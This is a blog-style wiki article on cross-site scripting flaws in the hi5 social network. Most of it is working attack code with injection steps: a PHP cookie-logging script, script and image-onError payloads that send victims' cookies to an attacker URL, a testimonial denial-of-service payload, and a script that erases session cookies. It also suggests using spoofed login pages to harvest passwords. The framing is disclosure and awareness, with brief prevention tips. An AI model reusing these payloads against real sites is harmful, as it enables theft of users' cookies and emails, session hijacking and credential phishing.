start > 2006-05-01 > 1

XSS: Smashing hi5 for fun and profit

Created by pabrantes. Last edited by pabrantes, 2 years and 81 days ago. Viewed 2,660 times. #4

[diff] [history] [edit] [rdf]

labels

attachments

XSS: Smashing hi5 for fun and profit

This may not be a complete guide on how to hack your way in the hi5 website, although when you finish reading, you'll realize that someone can be able to invade your privacy or DoS your account in many ways. And best of all you'll know how to protect yourself and reverse the situation!

Every attack described shows also the code needed and describes where and how to inject it. Although I take no resposability on how readers will use such information. The intent of this article is to expose the security problems and make people aware.

A special thanks to my friend André AKA Max, that challenged me to expand the attack vectors and also to be the test victim on some of the attacks.

All code presented here has been tested on Firefox for Linux and OS X.

1. Why the title?

Well if you are in the security area you should definatly have heard about aleph1's article about buffer overflows called Smashing the stack for fun and profit. Since we had a good laugh while getting all the XSS to work, it definatly was fun. That's when I realized that I could play a bit with the other title. But by no means, am I thinking in doing profit with this problems.

2. Problem description

Hi5 website suffers from multiple XSS (Cross Site Scripting) problems. This allows an attacker to inject javascript in places like messages, testimonials,etc that then will run on the victims computers.

3. The attacks

3.1 Getting emails

Interested in getting someone's email? Well no problem at all! You can do it in such a easy way. To perform this attack you have to do two things. First you have to write a small php script and store it somewhere. Then you have to wait that the victim runs a certain script. But let's go step by step. First the php script.

$cookie = $_GET['cookie'];

if(!$handle = fopen('cookies', 'a')) echo 'ups'; if(fwrite($handle,"$cookie")===FALSE) echo 'ups2';

echo "<html><body><h1>503 Service Unavailable</h1></body></html>"; ?>

NOTE: the place where you store this file you have also to create a file called cookies, otherwise the script will fail to write to the file.

André was the one that suggested us to spoof a 503, although you can always spoof an hi5 page. You just have to put the page you want in last line.

Now you have to make the victim run a small script that directs to that page, our favourite way is to send a message with the script. It's easy and painless. Go to person's hi5 and select to send a message (Nowadays the restriction of you can only see persons in your network doesn't exist). On the subject write whatever you want, then on the body write the following:

<script>location.replace('URL_FOR_PHPFILE.php?cookie='document.cookie)</script>
Hello if you have javascript enable you'll never see this message. If you don't have then you'll read this regular message.

Now when the victim opens this message will be redirected to your php file, the cookie will be stored and you then will only have to look for the Email= tag. And a 503 service unavailable will be desplayed.

If you now that the victim hasn't any popup blockers you can always modify a bit the attack to the following:

$cookie = $_GET['cookie'];

if(!$handle = fopen('cookies', 'a')) echo 'ups'; if(fwrite($handle,"$cookie ")===FALSE) echo 'ups2';

echo "<html><body onLoad=window.close()></body></html>";

And send the following message:

<script>window.open('URL_FOR_PHP.php?cookie='+document.cookie,'popup','width=1,height=1')</script>
The message that the victim will read.

This will make a popup open and close in the victims computer.

But you can always collect emails in a passive way. Imagine that you want your own logging system of who has visited your hi5 profile (since the one that hi5 displays doesn't show everyone). It can be done by adding the following code to one of the fields that support HTML such as the About me field.

<img src="" onError="window.open('URL_FOR_PHP.php?cookie='+document.cookie,'popup','width=1,height=1');">

Since no image will be loaded the onError event will kick in the script! Once again the hi5 teams doesn't strip this down. But you can still put on that image a nice image in order to prevent showing up the "error loading image icon". To do that you have have to add a new line to the previous script

document.images[A_NUMBER].src='URL_TO_IMAGE';

You just have to try the A_NUMBER value, start trying on 1, 2, etc… until the image you want is changed.

NOTE: You can use the previous script also to change some of the images of hi5. You just need to find their number in the images array.

NOTE: You can also use this attack in your message board.

IDEA: This redirect attack can also be used to redirect to a spoofed login page in order to harvest usernames + passwords.

HOW TO PREVENT THIS KIND OF ATTACKS: Well if it's a message comming from someone you don't know, maybe it's better to 1st disable the javascript in your browser! Also if your asked to relogin check the URL to see if it's really in the hi5.com domain.

3.2 Removing Ads in the main profile view

Doesn't banners on the top of the page annoy you as hell? Well, they do to me! So I figured that I would take them out for everyone that visits my main profile page. Are you interested in also removing then? Well just add the following code to one of the HTML fields:

<img src="" onError="document.getElementById('ad_banner').innerHTML='YOUR_HTML_HERE';">

3.3 DoS the testimonials

While testing the scripts with André we found that there was a way to DoS the testimonials, in order to make impossible to accept and reject pending testimonials.

Just send a testimonial to someone with the following code:

<img src="" onError="alert('DoS')">

I know it looks silly but it won't be able to reject nor accept the testimonial. Nor any other that is pending.

How to fix the situation if it happens: Disabling javascript won't do the work this time, since the reject uses javascript. So what you have to do is select "Block images from hi5.com" in your browser, then go to the testimonial page and reject the attack testimonials.

NOTE: This attack can also be done in the Photo comment and in the Fives comment.

3.4 Invalidating logins

You can also eliminate victim's hi5 session, doing that hi5 won't be able to know who the victim is and when he/she tries to access hi5 parts such has "My profile", "home", "My network", etc...it will be asked to register.

You can send the script through a message or put it in your profile. The cookie functions that are presented bellow are not ours. If you do a search for javascript cookies on google you'll find plenty of sites with these functions.

<img src="" OnError=" function createCookie(name,value,days)
{
if (days) {
var date = new Date();
date.setTime(date.getTime()+(days*24*60*60*1000));
var expires = '; expires='+date.toGMTString();\ }
else var expires = '';
document.cookie = name+'='+value+expires+'; path=/';
}
function readCookie(name)
{
var nameEQ = name + '=';
var ca = document.cookie.split(';');
for(var i=0;i < ca.length;i++)
{
var c = ca[i];
while (c.charAt(0)==' ') c = c.substring(1,c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
}
return null;
}
function eraseCookie(name)
{ createCookie(name,'',-1);
}
eraseCookie('Email');
eraseCookie('JSESSIONID'); ">

4. Conclusions

Well that's all for now. This could be easily fixed if the hi5 dev team escaped special chars correctly, like they actually do in the Subject of messages.

We only showed you a couple of attacks, but the limit is imagination! You can inject any javascript using the img tags. Have fun, and don't do anything you would regret. Also warn your friends of the problems! Let's get everyone xss aware, maybe then the dev team finally will fix the problems I've been reporting since January!

2 comments (by anonymous, pabrantes) | post comment